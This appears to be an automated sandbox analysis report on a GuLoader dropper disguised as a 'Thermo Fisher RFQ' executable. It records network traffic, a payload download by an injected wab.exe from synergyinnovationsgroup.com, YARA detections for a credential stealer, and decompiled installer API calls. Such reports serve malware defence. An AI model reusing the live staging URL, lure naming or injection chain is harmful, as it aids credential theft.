Aug 29, 2024 21:56:43.957571983 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.957597971 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.957715034 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.957742929 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.957819939 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.957844973 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.957897902 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.957920074 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.958034039 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.958041906 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.958271980 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.958293915 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.958360910 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.958463907 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.991154909 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.991343021 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.991343021 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.991343021 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.991416931 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.991672039 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.991851091 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.991923094 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.992105961 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.992306948 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.992306948 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.992307901 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.992367029 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.071118116 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.071559906 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.071753979 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.071984053 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.072083950 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.072305918 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.072550058 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.072582006 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.072639942 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.072774887 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.072829962 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.072941065 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.073081970 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.073081970 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.073129892 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:44.073182106 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.073183060 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:44.073422909 CEST	49838	443	192.168.11.20	199.217.106.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 21:56:42.924117088 CEST	52517	53	192.168.11.20	1.1.1.1
Aug 29, 2024 21:56:43.117943048 CEST	53	52517	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 21:56:42.924117088 CEST	192.168.11.20	1.1.1.1	0xe420	Standard query (0)	synergyinnovationsgroup.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 21:56:43.117943048 CEST	1.1.1.1	192.168.11.20	0xe420	No error (0)	synergyinnovationsgroup.com		199.217.106.226	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

synergyinnovationsgroup.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49838	199.217.106.226	443	2668	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 19:56:43 UTC	185	OUT	GET /wPKxzs124.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: synergyinnovationsgroup.com Cache-Control: no-cache
2024-08-29 19:56:43 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 19:56:43 GMT Server: Apache Last-Modified: Tue, 27 Aug 2024 22:25:57 GMT Accept-Ranges: bytes Content-Length: 240192 Connection: close Content-Type: application/octet-stream
2024-08-29 19:56:43 UTC	7969	IN	Data Raw: 39 20 72 2a 65 f5 3a 28 8f 05 ac 88 73 00 f1 d4 2e d2 64 de 73 df d7 78 3c b2 d9 95 44 2c f1 fa 0f de 35 cc ba 39 8a c7 22 71 a3 19 37 09 47 96 79 81 2b 5e 7f 58 70 37 b5 dd b9 cf 75 67 00 4c 8b 6b 9e 0b 98 f6 ad c1 27 f8 af 9f 11 1a e4 f2 f5 20 e4 aa b4 74 98 3d b1 fc ea e2 a0 a6 b7 ec 13 51 d7 47 10 21 86 54 37 9a c4 86 38 e1 7f 1f f6 28 8f 32 f3 04 26 3f 7c 8d e3 94 f7 f3 94 c5 ef 2b 08 49 d1 68 2d bb dc 3f 3f 1d 3e 50 92 75 3a 50 26 23 20 e3 17 e8 d8 2d 02 37 d4 cc cd 98 06 a9 70 34 40 15 52 90 24 b9 66 d7 c6 1d de e9 da 2a 2a 14 de 8c b3 48 02 fb 39 2c 7f 36 a7 51 46 66 ef 3d 72 c4 52 de 78 6f 6e cb c8 b2 0f 80 1b 5b f3 1a 87 d6 b2 bb 9d 89 22 2b e4 06 79 dd 93 3a bd e3 ec ad 67 6c 36 4b 48 ab 8a b3 78 2b 59 8e f9 e6 c8 c5 54 fe 56 75 29 d7 1d 45 dd Data Ascii: 9 re:(s.dsx<D,59"q7Gy+^Xp7ugLk' t=QG!T78(2&?\|+Ih-??>Pu:P&# -7p4@R$f*H9,6QFf=rRxon["+y:gl6KHx+YTVu)E
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: 3c 90 06 1b 20 36 70 8f 6b 95 fc 6e 26 eb e3 70 a3 64 b6 36 db 64 1e 31 f3 ab 33 9a 44 54 90 3d 10 7e a9 54 6f a3 07 ce 5b fc 46 7d 5d 4b 40 a3 6f c3 38 a3 2f ae 5d ff 85 83 0d ea 81 f7 b7 a0 13 43 23 9f 1c 41 af e5 44 b9 d5 c3 f6 bb 85 49 5c ea c5 21 7a 2d f7 69 c0 5e 5f 38 3f 0e 0a 1f 53 5e 9b 88 09 12 4f 2b 89 e1 8b b2 4b 54 4e a3 53 6e a7 5b 79 9f 0c 55 ac b8 4d f2 d2 70 dd f5 ae 1d 42 b5 80 65 6e 60 be d8 fb 6e 83 79 c2 39 ba 36 fe f0 0c 27 e9 63 db 37 f1 b9 24 11 35 1b 7e 7c a9 4c 86 de 20 31 bb 52 e1 e3 3b 5b f1 73 9f 04 68 44 75 4a 75 bd ed 10 3b 02 6b f6 84 d7 96 e8 1c e3 6c 8c 87 05 d0 93 44 63 55 02 34 81 91 e0 94 b6 70 e4 3b 58 33 af 11 fa a8 a9 32 7f f5 2b 27 cd f9 50 41 f6 10 1d 47 6d 6c fb 5b 75 82 ed 1e 6c 52 af ab 08 9a de af 54 45 79 7e Data Ascii: < 6pkn&pd6d13DT=~To[F}]K@o8/]C#ADI\!z-i^_8?S^O+KTNSn[yUMpBen`ny96'c7$5~\|L 1R;[shDuJu;klDcU4p;X32+'PAGml[ulRTEy~
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: 9e 79 ac d0 52 19 c3 61 4f 19 8e 6a aa 9a 3d d8 b8 87 5b 19 5d c9 f8 bf 9a 71 07 79 4b ed 29 c3 79 67 1a bc 8b c9 d9 b5 49 d7 80 c4 76 13 95 5f 98 2c 2d cf be c4 2f 5c 1d 41 bd a5 0b bc 4a f0 97 ea 87 dd ed 21 34 f1 c4 a4 63 24 41 b2 a0 e3 7f 42 05 15 17 d0 91 bf 67 ec 68 b0 b7 ef 76 ba f1 ee f4 e2 95 fd b0 9d 3c bd 6c 54 be 9f 11 c3 a8 fd 93 c2 2f 91 39 2f d6 37 e7 ca 8c 79 f8 f1 28 5b 2c 37 96 35 7c 91 20 39 0b 7f 77 a4 1e 8e 52 5c ae ea 3a b7 6b 31 d1 88 c0 18 d8 ea 86 d4 09 a2 89 17 5b 8a 94 5b 68 47 82 57 d9 1f d4 b4 ae 49 72 fb e3 72 e9 ba 9e 04 cf 63 f5 0e 89 7d e7 ec eb 1a a1 f2 7e 2a de f8 5d 21 5b c9 f3 52 d2 8f 42 36 f2 aa 45 fe 83 e2 49 a8 f0 25 c0 19 7c 15 f9 33 27 cd fa a4 50 01 ac 2f 1f df 10 fa 49 ee 1d 0b 87 fa d1 88 82 ec bf 6a 86 e3 3b Data Ascii: yRaOj=[]qyK)ygIv_,-/\AJ!4c$ABghv<lT/9/7y([,75\| 9wR\:k1[[hGWIrrc}~*]![RB6EI%\|3'P/Ij;
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: 83 e5 2a 91 a1 95 07 d3 f7 f5 03 88 59 8b 18 3c 67 56 2b 10 ba 00 e6 4d 85 01 7f 01 34 49 74 a6 5d 64 91 02 66 ff f2 b7 f7 a7 07 5f 3a 8f 8b 71 d1 22 6c 2d f4 f6 03 8a 75 be 7b eb b7 a3 7c 2f af 6a 50 ae 3d 4d aa 0f ae a6 7c d3 94 f1 58 93 1d 43 dd b9 d0 5f 8f 5b 63 6d 6e a6 0a b9 79 e4 3b f1 f6 35 e5 de 3a c7 16 86 c8 4b 38 7e 36 37 e3 c0 82 1a 2c 49 f4 6d 57 f8 e5 3f a5 49 16 da 9c 69 cb 8f 9f 14 2c 85 a2 a0 9b 6b 96 25 28 8f 69 0d 09 5f 16 3b 2f 5a 14 b8 50 0c fb cb c2 23 f3 2f 85 57 bd ef 2f cc 70 40 5e 8d 64 56 97 b3 b4 55 0f c9 87 3f 17 b8 d3 37 89 7d ca 17 86 b6 46 ef 05 b8 da 23 de 59 fc e1 d1 87 06 78 c0 12 10 91 63 4c 17 65 93 76 3c e1 54 fd 61 d1 fa 43 fe 0e f3 4b 7c 6b a1 10 84 c9 a8 c3 88 b4 01 84 97 b9 51 1e fb ec a4 a1 67 05 fa f1 13 b7 48 Data Ascii: *Y<gV+M4It]df_:q"l-u{\|/jP=M\|XC_[cmny;5:K8~67,ImW?Ii,k%(i_;/ZP#/W/p@^dVU?7}F#YxcLev<TaCK\|kQgH
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: 3c 67 47 5c 0f 1a c6 23 f7 46 0c 6f 20 ac 87 99 57 69 b6 b2 2e f2 13 2e d6 44 01 2d 1b ee 6e 77 1b f9 14 15 c6 cf 02 01 9b 78 c4 e1 22 f8 af 9f d0 fe e4 f2 4d 08 a6 aa b4 7e 66 31 fb fc 14 ee a2 a6 9f 62 13 51 d1 28 53 21 86 5e c9 94 c7 86 c6 ed 6d 1f d6 29 8f 32 f3 5c d8 31 6e 8d 1d 98 65 f3 6a c9 f0 34 3c 2e ee 5f db 89 02 79 32 51 f3 02 ad 1c 53 25 f8 5d 59 8c 8e 96 b2 40 dc 58 bd a2 d1 ff 62 89 62 3e ce 67 27 f4 70 e5 08 f7 83 72 8c c9 b7 45 c3 39 f0 81 bf bc 28 e8 39 d2 73 25 a7 71 16 23 ef 3d 1e c5 51 de df 75 8d ad c8 b8 92 7e 17 48 f3 75 d7 d6 b0 b0 f9 fc 28 2b e2 58 76 d6 93 cc b1 eb ec df 79 7c 18 84 24 05 8a 93 72 5f 6c 4e fa e7 e8 c4 14 fe 56 d8 61 d7 1d 46 23 17 fe d0 d0 75 3c 1c 1f 5b 37 32 72 a5 fb 4f 68 1e f2 5e a6 54 2d fd 3c ba 00 bf b3 Data Ascii: <gG\#Fo Wi..D-nwx"M~f1bQ(S!^m)2\1nej4<._y2QS%]Y@Xbb>g'prE9(9s%q#=Qu~Hu(+Xvy\|$r_lNVaF#u<[72rOh^T-<
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: ce 81 d7 af 02 33 44 dd 91 15 bf a1 1a 48 b0 2b ef f3 bb a5 49 a2 eb fc ce 7b 14 fd 97 cc 5a 5f e6 30 0e 0a 3f a8 50 9a 88 f7 e2 4a 2a 89 3f 80 bb 4b 74 b5 a2 6a 6b 59 5a 40 b5 09 55 ac cb e9 24 2c 85 dc 05 a3 1d 62 9b 9f 65 6e 94 9a d1 fb 6d 4d 76 cb 57 9b 24 fe f1 0c d9 f9 7a c3 37 f1 b9 24 13 3d 1b b8 2a af 4c 08 b7 e1 df bb 52 c1 c0 28 5b f1 8d 60 33 43 44 75 b4 07 90 ed 30 34 2a 45 f6 7a dc d1 db 1c e3 68 5a a4 07 d0 b1 64 40 55 08 ce af 92 e0 b4 ba 8e ea 3b a6 3d 58 1d fa 56 85 3d 7f d5 24 d9 cc c0 bd 40 cf 31 63 4f 6d 92 f3 61 64 f1 ff 0b 4c 25 87 b0 08 64 da 87 48 45 87 78 dd e8 32 47 e0 ec 92 85 d6 fc dc 54 b1 74 df c2 47 f1 58 42 2e f2 54 fe f8 b2 66 a7 62 17 cf 61 06 1b 12 4f 3c ef 79 ef 89 2b c9 5e e8 85 fe 31 71 0a 44 b4 d2 0f d8 63 a1 1a f2 Data Ascii: 3DH+I{Z_0?PJ?KtjkYZ@U$,benmMvW$z7$=LR([`3CDu04*EzhZd@U;=XV=$@1cOmadL%dHEx2GTtGXB.TfbaO<y+^1qDc
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: a2 cc 92 4c f0 69 1d 8e dd c5 c9 4f 85 c2 cb 09 57 ef b0 5e 9f 51 59 6a 93 1d ad ef 41 6a e1 48 b8 76 ef 76 4e c5 c0 0b 1d 94 2c a0 9d 1c a5 92 59 b7 61 ee ec b2 fd 93 d9 be bf 38 2f fc cd 3a cc 8c 39 90 d7 f5 5b 0c 2e 96 cb 71 67 2e 11 af 7f 89 a2 24 02 8c ce 51 37 2a 49 6a 08 25 85 c8 18 0c dc e1 d4 09 b9 18 3e 5b 8a 9e 79 9a 4b 82 77 c4 3f d2 b4 50 48 b5 d7 e9 72 e9 ba 9b 0e cf 66 8f 7a 89 7d 1d 9f 10 0c a1 82 56 42 ab f8 57 56 d1 c7 f3 56 d2 b5 42 36 f2 aa 45 f4 83 e2 49 a8 fa 25 c0 06 7c 15 f9 33 27 cd e3 a4 50 01 ac 2a 1e df 1a f2 4c ee 1d 4b bc f9 db 88 a2 0e b3 60 86 3d 37 91 3c dd cd ad d8 87 88 29 4a 33 3d f9 88 0f b2 a4 cc 75 de d9 f6 b1 de 78 fe 36 6e 07 dc 34 3c 70 af 96 99 fc 6e f8 eb da 6c a3 16 ad c8 d7 15 bc 7e f7 aa 33 90 9a 5a 91 3d 10 Data Ascii: LiOW^QYjAjHvvN,Ya8/:9[.qg.$Q7Ij%>[yKw?PHrfz}VBWVVB6EI%\|3'PLK`=7<)J3=ux6n4<pnl~3Z=
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: ea 49 82 55 39 af 6a ae 51 08 57 aa f1 a2 56 70 49 6a 8c d6 93 3d 56 b2 d0 d1 a1 87 74 72 6d 90 aa fb b7 58 ff 3b 0f fa ca e4 c7 2d c7 16 86 c8 46 0f 69 c8 3b ee 3e 00 73 13 f0 fb 92 a8 de 96 56 a4 49 ee f4 83 69 cb 71 6d 15 2d a5 b6 5e 97 6a 68 04 3b 93 69 0d f7 a0 23 29 2f 35 3d 46 5c 06 db ba df 22 f3 16 0b 3e bc ef 09 f9 5b 40 5e 73 94 57 96 b3 4a a7 0c c8 a7 1d 15 b8 d3 c9 76 45 e4 05 86 b6 66 99 6d b9 da a8 15 57 fc e0 0f 8a 0c 78 e0 ef 1e 90 63 b2 e7 66 92 76 e2 f0 5b fd 41 37 fb 7a e9 f0 f2 72 99 67 a1 10 09 12 ad c3 ae c2 68 85 97 97 d2 01 fb ea 5a 51 60 04 da e8 ed bb 49 a2 12 47 57 4a 86 bc e2 68 49 c2 97 8f ff 8c 0b aa be 1e 70 8b 56 b9 8e 80 81 92 7f 8c f9 62 00 c3 ef b0 2c ab 6a 82 a8 c3 d1 b2 79 72 6a 29 37 f4 b2 e8 2d 0a 79 3b ed d1 c3 79 Data Ascii: IU9jQWVpIj=VtrmX;-Fi;>sVIiqm-^jh;i#)/5=F\">[@^sWJvEfmWxcfv[A7zrghZQ`IGWJhIpVb,jyrj)7-y;y
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: 37 cb 4a 15 1d 5f 7b a7 ec 13 51 29 4a 0d 21 78 42 3e 9a c4 9d 57 c6 7f 1f fc f4 fc 2e f2 04 2c 19 82 81 eb 94 18 68 94 c5 eb ca bc 59 d1 e4 e8 72 fd 87 c0 5c ed 71 ee 82 53 23 0c ad 5c 87 70 64 b5 4b 22 74 b6 a2 a3 f7 52 88 12 51 60 47 24 fe 04 d0 7b ea 83 52 87 37 b9 49 4e 8f fc 8d be 2d 38 fa 39 26 57 29 a6 51 1c dd e1 30 3e 3b 5d d3 df 7d 23 ad c8 b2 56 a0 1a 5b f3 1a 3f 5b f4 ba 96 89 d7 25 ea a6 5a dd 93 32 bd 1d e2 a2 67 4c 18 f4 4b ab 74 9d 68 2b 2b 75 f8 e6 b8 3b 1a ef 56 75 29 d7 1d 47 23 17 f8 d0 5d 12 29 1c 39 a5 39 21 72 7b f7 43 68 e0 d6 ff a6 74 27 60 c2 b6 ea b3 d1 2a 52 b1 b0 63 54 8e 50 72 2b 3d b8 d6 08 99 7f f7 32 74 64 09 27 89 64 25 9e 8f ed 45 d8 a0 95 01 f3 6a d5 d3 88 a7 85 59 32 67 a8 27 31 ba 20 f5 4d 7b 0f 93 00 35 57 74 a6 5d Data Ascii: 7J_{Q)J!xB>W.,hYr\qS#\pdK"tRQ`G${R7IN-89&W)Q0>;]}#V[?[%Z2gLKth++u;Vu)G#])99!r{Cht'`*RcTPr+=2td'd%EjY2g'1 M{5Wt]
2024-08-29 19:56:43 UTC	8000	IN	Data Raw: 08 55 aa 46 79 2f 2c e0 a4 0b a2 17 9f 9b 9f 65 6e 4c 49 d8 fb 6d b3 84 ce 51 bb 16 ff f1 0c 27 a0 bd d5 31 f1 47 d6 19 35 e5 4a 22 a8 23 1e df de 3b 9b 53 c1 e0 3b 02 cf 70 60 c2 b5 ba 79 4b 0b b3 cd 17 3f 2a 45 08 8a d0 e8 cd e2 ef 65 a4 88 01 d0 99 c4 be 54 3b 3e a1 95 e0 6a ba 8f ea 11 78 36 51 1d fa 56 87 39 7f f5 d5 d5 c1 c0 63 44 f6 10 63 b1 6c 55 6e 62 64 83 cd 3e 4c 55 af 26 4c 64 d0 ae 71 95 37 73 e4 c7 e5 35 1f cc 88 7b d8 fe 22 7a a8 74 df 3c c6 bc 58 62 22 d7 84 4f 07 b3 5b 81 ef 17 cf 53 81 ea ee b0 e2 ed 79 ef fa 41 c6 57 ee 7b 0e 39 78 d7 6a a7 d2 0f fe 63 ac 22 e5 37 fe 66 b2 13 af 33 d4 8f 46 f5 df fa bc 55 9c ba 5d b3 f7 49 02 99 60 dc 17 3c 67 4a ab 03 71 68 4c 6f 4d 35 28 00 ac 87 67 5b 9f b4 6c 22 fb 13 41 86 45 61 1e 4a 1a 91 88 fe Data Ascii: UFy/,enLImQ'1G5J"#;S;p`yK?*EeT;>jx6QV9cDclUnbd>LU&Ldq7s5{"zt<Xb"O[SyAW{9xjc"7f3FU]I`<gJqhLoM5(g[l"AEaJ

Target ID:	0
Start time:	15:55:12
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
Imagebase:	0x400000
File size:	605'160 bytes
MD5 hash:	9768C048C979AEEEEB051574D452B626
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.87355602773.00000000072D9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:56:35
Start date:	29/08/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
Imagebase:	0xe0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.91557808162.0000000037C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.1%
Total number of Nodes:	1585
Total number of Limit Nodes:	44

Executed Functions

Function 0040352F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403552
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040357D
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403629
#17.COMCTL32(?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403666
OleInitialize.OLE32(00000000), ref: 0040366D
SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 004036A1
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",?,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",00000000,?,?,0000000A,?), ref: 004036DA
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403812
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403823
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040382F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403843
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040384B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040385C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403864
DeleteFileW.KERNELBASE(1033,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403878
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",00000000,?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403951

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,?,0000000A,?), ref: 00406561

wsprintfW.USER32 ref: 004039AE
GetFileAttributesW.KERNEL32(1012,C:\Users\user\AppData\Local\Temp\), ref: 004039E1
DeleteFileW.KERNEL32(1012), ref: 004039ED
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1B

Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E

CopyFileW.KERNEL32(C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,1012,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31

Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,1012,?), ref: 00405B60
Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,1012,?), ref: 00405B6D

Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(75F03420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8

OleUninitialize.OLE32(?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403A7F
ExitProcess.KERNEL32 ref: 00403A9C
CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,1012,00000000), ref: 00403AA3
GetCurrentProcess.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403ABF
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AFE
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
ExitProcess.KERNEL32 ref: 00403B46

Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405B08

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403807, 0040380C, 00403822, 0040382E, 0040383D, 0040384A, 00403856, 0040385E, 0040394C, 004039CD, 004039F9, 00403A1A, 00403A23
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards, xrefs: 00403924
\Temp, xrefs: 00403829
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical, xrefs: 004037F7, 00403919, 00403966, 00403974
UXTHEME, xrefs: 0040361D, 00403622, 00403628
TMP, xrefs: 0040385F
"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 004036A7, 004036AD, 004036C2, 004038A0
Error launching installer, xrefs: 004038FA
C:\Users\user\Desktop, xrefs: 0040396F
1012, xrefs: 00403991, 004039C2, 004039E0, 004039EC, 00403A2B, 00403A3D, 00403A6A
TEMP, xrefs: 00403857
Low, xrefs: 00403845
1033, xrefs: 00403873
NSIS Error, xrefs: 00403692
~nsu%X.tmp, xrefs: 004039A5
C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe, xrefs: 00403A2C
SeShutdownPrivilege, xrefs: 00403AD5

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
